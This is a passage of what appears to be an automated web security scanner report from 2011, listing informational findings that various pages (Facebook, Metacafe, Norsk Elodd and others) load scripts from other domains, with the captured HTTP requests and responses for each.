<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/2xUG0B1QtMs.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.145. http://www.facebook.com/peoplespostcodelottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/peoplespostcodelottery

Issue detail

The response dynamically includes the following script from another domain:

http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

GET /peoplespostcodelottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTUnMC-QzxdCoW9pJpTTF; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=1P6PH; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.64
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 36902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/v1/yu/r/Cx2s6uhEG36.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.146. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

Response

19.147. http://www.gx4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gx4.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://widgets.twimg.com/j/2/widget.js

Request

GET / HTTP/1.1
Host: www.gx4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:13:58 GMT
Server: Apache
Last-Modified: Fri, 05 Feb 2010 11:54:30 GMT
ETag: "34e8030-17e7-1d372980"
Accept-Ranges: bytes
Content-Length: 6119
Connection: close
Content-Type: text/html; charset=ISO-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>G4,
...[SNIP]...
<P>

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

19.148. http://www.heavenaffiliates.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.heavenaffiliates.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js

Request

GET / HTTP/1.1
Host: www.heavenaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:32 GMT
Server: Apache FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.heavenaffiliates.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title> He
...[SNIP]...

   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

19.149. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:16 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

<title>Lightbox 2<
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

19.150. http://www.incomate.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.incomate.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://landmark-project.com/feed2js/feed2js.php?src=http%3A%2F%2Fwww.casinogamblingweb.com%2Fgambling.xml&num=2&desc=100&targ=y&utf=y

Request

GET / HTTP/1.1
Host: www.incomate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/html
Last-Modified: Tue, 10 May 2011 20:41:22 GMT
Accept-Ranges: bytes
ETag: "73f739f52fcc1:0",""
Server: Microsoft-IIS/7.5
Date: Mon, 16 May 2011 12:33:51 GMT
Connection: close
Content-Length: 15841

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<hea
...[SNIP]...
<div id="feed">
<script language="JavaScript" src="http://landmark-project.com/feed2js/feed2js.php?src=http%3A%2F%2Fwww.casinogamblingweb.com%2Fgambling.xml&num=2&desc=100&targ=y&utf=y" charset="UTF-8" type="text/javascript"></script>
...[SNIP]...

19.151. http://www.metacafe.com/fplayer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://s.mcstatic.com/JS12/Externals/?v=7850
http://s1.mcstatic.com/JS12/Home/?v=7850
http://s4.mcstatic.com/JS12/Global/?v=7850
http://s4.mcstatic.com/JS12/Shared/BillboardManager.js?v=7850
http://s4.mcstatic.com/JS12/Shared/BillboardPlayer.js?v=7850
http://widgets.twimg.com/j/2/widget.js

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 16 May 2011 12:25:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b34cef86fb081c11b18f1c7533ccdcf4; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=b26d5505ed27474ffea988f3d3dd0b02; expires=Tue, 15-May-2012 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%228744ed5d828ea0d23416bbe1e22d1055%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3333427372.20480.0000; expires=Mon, 16-May-2011 13:25:14 GMT; path=/
Content-Length: 73965

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://s4.mcstatic.com/CSS/Global/?v=7850" /><script type="text/javascript" src="http://s4.mcstatic.com/JS12/Global/?v=7850"></script><link type="text/css" rel="stylesheet" href="http://s1.mcstatic.com/CSS/Home/?v=7850" /><script type="text/javascript" src="http://s1.mcstatic.com/JS12/Home/?v=7850"></script><link type="text/css" rel="stylesheet" href="http://s4.mcstatic.com/CSS/Shared/BillboardPlayer.css?v=7850" /><script type="text/javascript" src="http://s4.mcstatic.com/JS12/Shared/BillboardPlayer.js?v=7850"></script><script type="text/javascript" src="http://s4.mcstatic.com/JS12/Shared/BillboardManager.js?v=7850"></script>
...[SNIP]...
</div>
       <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

       <script type="text/javascript" src="http://s.mcstatic.com/JS12/Externals/?v=7850"></script>
       
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.152. https://www.neogamespartners.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neogamespartners.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js

Request

Response

19.153. https://www.norskelodd.com/no/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js

Request

GET /no/ HTTP/1.1
Host: www.norskelodd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:43:11 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 100157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.154. https://www.norskelodd.com/no/FAQ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/FAQ

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js

Request

GET /no/FAQ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:30 GMT
Connection: close
Content-Length: 122180
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.155. https://www.norskelodd.com/no/aboutus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/aboutus/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js

Request

GET /no/aboutus/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 101153
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.156. https://www.norskelodd.com/no/charity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/charity/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js

Request

GET /no/charity/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 99027
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.157. https://www.norskelodd.com/no/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js

Request

GET /no/default.aspx HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 100157
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.158. https://www.norskelodd.com/no/fair-play/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/fair-play/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js

Request

GET /no/fair-play/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:31 GMT
Connection: close
Content-Length: 99395
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.159. https://www.norskelodd.com/no/forgotten-password previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/forgotten-password

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js

Request

GET /no/forgotten-password HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 98788
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.160. https://www.norskelodd.com/no/play/3Wow previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/play/3Wow

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js

Request

GET /no/play/3Wow HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:32 GMT
Connection: close
Content-Length: 100360
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.161. https://www.norskelodd.com/no/play/7thHeaven previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/play/7thHeaven

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js

Request

GET /no/play/7thHeaven HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:02:04 GMT
Connection: close
Content-Length: 100366
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.162. https://www.norskelodd.com/no/play/GonzosQuest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/play/GonzosQuest

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js
